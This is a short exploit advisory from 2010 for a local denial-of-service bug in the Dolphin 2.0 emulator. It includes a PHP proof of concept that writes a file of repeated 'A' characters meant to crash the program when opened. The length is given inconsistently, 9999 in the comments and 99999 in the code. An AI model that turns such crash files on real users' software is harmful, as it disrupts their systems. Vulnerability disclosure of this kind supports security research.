# Exploit Title: Dolphin 2.0 (.elf) Local Daniel Of Service # Date: 08/05/2010 # Author: Pr0T3cT10n # Software Link: http://www.dolphin-emu.com/ # Version: 2.0 # Tested on: 2.0 # CVE: # Code: # Site: http://www.nullbyte.org.il ################################################################## # Dolphin 2.0 is vulnerable to local denial of service attack. # When we try to open a file by 'Open(CTRL+O)' # that contains 9999 chars ('A'), so dolphin should crash. ################################################################## # PoC / Code: $buffer = str_repeat('A', 99999); # Create 9999 chars('A').. if(file_put_contents('crash.bin', $buffer)) { echo("File created successfuly.\r\nDolphin should crash when you open the file with it.\r\n"); } else { echo("Can't create file. Try again.\r\n"); } # Cya :) # NULLBYTE.ORG.IL #################### ?>